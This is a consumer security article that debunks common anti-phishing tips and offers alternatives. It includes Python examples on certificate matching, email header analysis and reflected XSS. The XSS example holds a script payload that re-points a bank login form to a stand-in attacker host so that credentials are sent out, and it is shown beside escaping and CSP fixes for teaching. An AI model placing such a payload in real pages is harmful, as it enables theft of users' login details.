Anti-Phishing tips debunked
Today almost every online banking website has an "anti-phishing tips" page meant to teach an ordinary computer user how to deal with those annoying emails that try to collect personal data.
While the educational initiative is praiseworthy, many of the tips, some of them originating from security experts, are in fact questionable, incorrect, or misleading.
This article debunks the most common myths. At the end of the page you will find a couple of tips that help you correctly tell a genuine website from an impersonated one.
Myth #1: Secure, encrypted web page indicates a valid website.
Contrary to popular advice, never rely solely on the "https://" prefix or the padlock icon that indicate a "secure" page. A phishing website can have a perfectly valid TLS (SSL) certificate: a certificate only proves that whoever runs the site controlled the domain name written in it when it was issued, and the browser only checks that this name matches the host name in the address bar. It says nothing about who that party is.
You can open the certificate details and compare the names in its Subject Alternative Name field (older advice says the "Common Name" field, which modern browsers ignore) with the host name of the organization's website, but this requires some technical expertise, and the browser has already done that comparison for you. What the browser cannot do is tell you whether that domain belongs to your bank.
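To make the distinction concrete, here is an added example (not code from the original article) that re-implements the host name check a browser performs against a certificate's DNS Subject Alternative Names, and then applies the second check the padlock cannot do for you: is the domain actually the bank's? All host names, SAN lists and the domain login-secure.test are constructed for illustration; nothing is fetched from the network.

```python
"""Added example (not from the original article): how a browser decides that a
certificate is "valid" for the page you are on, and why that check cannot
tell your bank apart from a look-alike domain.

All host names and Subject Alternative Name (SAN) lists below are constructed
for illustration; no network connection is made.
"""


def hostname_matches(hostname: str, san_dns_names: list[str]) -> bool:
    """Return True if the certificate's DNS SANs cover `hostname`.

    Implements the matching rule browsers apply (RFC 6125 style, simplified):
    case-insensitive exact match, or a wildcard that is the entire leftmost
    label and stands in for exactly one label.
    """
    host = hostname.rstrip(".").lower()
    for name in san_dns_names:
        name = name.rstrip(".").lower()
        if name == host:
            return True
        if name.startswith("*."):
            suffix = name[1:]                      # e.g. ".bank.example"
            if not host.endswith(suffix):
                continue
            prefix = host[: -len(suffix)]          # the part the "*" replaces
            # "*" must replace exactly one non-empty label: no dots, and not
            # the bare domain itself (so "*.bank.example" != "bank.example").
            if prefix and "." not in prefix:
                return True
    return False


def same_site(hostname: str, expected_domain: str) -> bool:
    """True if `hostname` is `expected_domain` or a subdomain of it.

    This is the comparison the user must make: is the registrable domain the
    bank's, rather than "does the bank's name appear somewhere in the URL".
    """
    host = hostname.rstrip(".").lower()
    expected = expected_domain.rstrip(".").lower()
    return host == expected or host.endswith("." + expected)


def assess(hostname: str, san_dns_names: list[str], bank_domain: str) -> dict:
    """Combine the browser's check (padlock) with the user's check (is_bank)."""
    return {
        "padlock": hostname_matches(hostname, san_dns_names),  # what the browser shows
        "is_bank": same_site(hostname, bank_domain),           # what the padlock cannot tell you
    }


if __name__ == "__main__":
    bank_sans = ["bank.example", "*.bank.example"]
    # A phisher who registered "login-secure.test" can obtain a perfectly valid
    # certificate for any name under it, including one that begins with the
    # bank's own domain.
    phish_host = "bank.example.login-secure.test"
    print(assess("www.bank.example", bank_sans, "bank.example"))
    print(assess(phish_host, [phish_host], "bank.example"))
```

Both sites get a padlock; only the second check separates them, and it is the check no "https://" prefix can do on your behalf.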
Myth #2: Secured by [insert authority name]. Click here to verify.
Have you seen those? They are worthless. The splash window you get by clicking the seal does not guarantee that you are on a legitimate website: the seal is just an image, and both it and the window it opens can be copied onto any page.
Myth #3: Address bar always shows a correct URL.
Another piece of faulty advice is to check whether the address bar shows the correct URL. That is not enough to establish the validity of a website.
Vulnerabilities in browser software have allowed phishers to spoof what is shown in the address bar.
Another kind of attack, DNS spoofing, can send you to an impersonated server even though the address bar shows the correct name.
Myth #4: Moving mouse over a link shows the real URL in the status bar.
Status bar text can easily be changed by a page's script, and a link can swap its destination at the moment you click it. In fact, this is even easier than spoofing the address bar content.
Myth #5: Anti-phishing software prevents scams.
Just as antivirus software cannot detect all new malicious code, an anti-phishing browser plug-in (often offered for free by internet providers) cannot detect every phishing attempt.
Worse, by adding software (sometimes of questionable quality) to your browser you expose yourself to malware that specifically targets that software.
Myth #6: An email containing your personal data is legitimate.
If you receive a message from your bank that contains your name and your account number (or part of it), it may still be fraudulent.
Phishers can obtain some of your personal data from public databases or from data leaked by other organizations.
Myth #7: It is safe to log in once you know the website is legitimate.
NO! A cross-site scripting (XSS) vulnerability in the legitimate website could allow a sophisticated attacker to turn the site's own login form against you: a script injected through a crafted link re-points the form so that what you type is sent to the attacker's server, or redirects you to the attacker's website, as soon as you click "Login" or hit "Enter". Read our tips below on how to prevent this.
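The following added example (not code from the original article) shows the mechanism in miniature: a login page that reflects a "notice" parameter without escaping, the script an attacker would place in an emailed link to re-point the form, and the hardened rendering. The page template, the `notice` parameter, and the host attacker.example are hypothetical.

```python
"""Added example (not from the original article): how a reflected cross-site
scripting bug in a bank's own login page lets an attacker re-point the login
form, beside the server-side fix. The page template, the `notice` parameter
and the attacker host are all hypothetical.
"""
import html
import re

# A login page that echoes a "notice" query parameter (e.g. "Session expired")
# back into the page, as many real sites do.
LOGIN_PAGE = """<!doctype html>
<form id="login" action="/login" method="post">
  <p class="notice">{notice}</p>
  <input name="user"> <input name="pass" type="password">
  <button>Login</button>
</form>"""

# What the attacker puts in the link they email to the victim. The form
# still looks and behaves like the bank's own, but now posts to the attacker.
PAYLOAD = ("<script>document.getElementById('login').action"
           "='https://attacker.example/collect'</script>")


def render_vulnerable(notice: str) -> str:
    """Interpolates untrusted input unescaped: the classic reflected XSS."""
    return LOGIN_PAGE.format(notice=notice)


def render_hardened(notice: str) -> str:
    """Escapes the input so the browser renders it as text, not markup."""
    return LOGIN_PAGE.format(notice=html.escape(notice, quote=True))


def response_headers() -> dict:
    """Defence in depth: even if some script does run, a Content-Security-Policy
    with form-action restricts where any form on the page may be submitted."""
    return {"Content-Security-Policy": "form-action 'self'; default-src 'self'"}


def contains_script(page: str) -> bool:
    """Would a browser find a script element to execute in this page?"""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("vulnerable page carries attacker script:", contains_script(render_vulnerable(PAYLOAD)))
    print("hardened page carries attacker script:  ", contains_script(render_hardened(PAYLOAD)))
```

Note that in the vulnerable case the address bar shows the bank's real domain with a valid certificate, which is exactly why the myths above fail: the victim did nothing wrong except follow a link in an email.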
What to do to avoid getting scammed
Scammers use phishing emails, fake websites, and social engineering to trick people into handing over personal information or money. The tips below are practical steps you can take to avoid being caught.
Tip #1: Do not click on links in your e-mail.
If you receive a message from your bank asking you to do something, do not click on links in the email and do not use forms in the email to log in.
Instead, open your browser, go directly to your bank's website, log in, and continue there. Even if the email is from someone you know, DO NOT CLICK ON THE LINKS.
Tip #2: Invalid credentials usually work on impersonated websites.
If you feel there is something wrong with a website, try to log in with an invalid username and an invalid password.
If the website then shows a "Logon failed" page, you are possibly on a legitimate website.
This does not always work: some impersonators simulate a failed logon to make the victim type the credentials a second time, or redirect to the legitimate website after collecting them. But if your invalid credentials get you right through, it is definitely a phishing attempt.
Tip #3: Report the message to the company impersonated in the email.
Most financial organizations have guidelines and dedicated email addresses for reporting security problems.
If you suspect a message is a phishing attempt, forward it to the organization. You can find the address to forward suspicious emails to in our Scam Reporting Database. Include the full email headers, since they show where the message actually came from and which links it contains.
Do not expect a reply from the organization; they receive thousands of such reports.
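Here is an added example (not code from the original article) of what the impersonated organization's abuse team does with a forwarded message, which also illustrates Myth #4 (visible link text versus the real destination) and Myth #6 (a message can greet you by name and quote part of your account number and still be a fake). The raw message below is constructed for illustration; every address, host name and IP address in it is fictional, and only the Python standard library is used.

```python
"""Added example (not from the original article): pulling the evidence out of
a suspicious email the way the impersonated organization's abuse team would,
which is why the full headers matter when you forward a report.

The message below is constructed for illustration; every address, host name
and IP in it is fictional. Only the Python standard library is used.
"""
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

RAW_EMAIL = """\
Return-Path: <bounce@mailer.login-secure.test>
Received: from mail.login-secure.test (mail.login-secure.test [192.0.2.10])
    by mx.example.net with ESMTP id k7Q2x; Mon, 1 Jan 2024 10:00:00 +0000
From: "Example Bank" <alerts@bank.example>
Reply-To: support@bank-example-verify.test
To: customer@example.net
Subject: Action required on account ending 4821
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Dear John Smith, please review the recent activity on account ending 4821.</p>
<p><a href="https://bank.example.login-secure.test/signin">https://www.bank.example/signin</a></p>
<p>If this was not you, <a href="https://bank-example-verify.test/undo">click here</a>.</p>
</body></html>
"""


class _LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def _domain(header_value) -> str:
    """Domain part of an address header such as 'Name <user@host>'."""
    return parseaddr(str(header_value))[1].rsplit("@", 1)[-1].lower()


def _same_site(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)


def analyze(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    from_domain = _domain(msg["From"])
    findings = []

    # Envelope sender and reply routing that disagree with the displayed sender.
    for header in ("Reply-To", "Return-Path"):
        if msg[header] and _domain(msg[header]) != from_domain:
            findings.append((f"{header.lower()}-mismatch", _domain(msg[header])))

    # Visible link text versus the real destination (the status-bar problem),
    # plus any link that leaves the sender's own domain. The personalised
    # greeting and partial account number play no part in the verdict.
    body = msg.get_body(preferencelist=("html",)).get_content()
    collector = _LinkCollector()
    collector.feed(body)
    for text, href in collector.links:
        href_host = (urlparse(href).hostname or "").lower()
        if text.lower().startswith(("http://", "https://")):
            text_host = (urlparse(text).hostname or "").lower()
            if text_host != href_host:
                findings.append(("link-text-mismatch", f"{text_host} -> {href_host}"))
        if not _same_site(href_host, from_domain):
            findings.append(("link-offsite", href_host))

    return {
        "from_domain": from_domain,
        "received": [str(h) for h in msg.get_all("Received", [])],  # mail path, hop by hop
        "links": collector.links,
        "findings": findings,
    }


if __name__ == "__main__":
    for kind, detail in analyze(RAW_EMAIL)["findings"]:
        print(f"{kind:22} {detail}")
```

Forwarding only the visible text would lose the Return-Path, Received and Reply-To lines, which is where most of the evidence lives.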
The bottom line
In conclusion, the common anti-phishing tips are not as reliable as they look. A "secure" page, an authority seal, a correct-looking address bar or status bar, and anti-phishing software can each be defeated, and a message that knows your name and account number can still be a fake.
What works is changing your own behaviour: never follow links in emails, test a suspicious login form with invalid credentials, and report phishing attempts to the organization being impersonated.
Phishing tactics keep changing, so keep your knowledge up to date and stay cautious in your online interactions to protect your personal information and your money.